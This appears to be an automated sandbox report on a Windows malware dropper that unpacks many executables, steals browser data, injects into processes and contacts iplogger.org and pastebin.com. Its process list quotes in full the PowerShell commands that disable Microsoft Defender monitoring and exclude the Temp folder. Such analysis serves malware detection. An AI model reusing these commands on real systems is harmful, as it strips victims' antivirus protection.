N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2660 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 276

C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$80226,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\mshta.exe

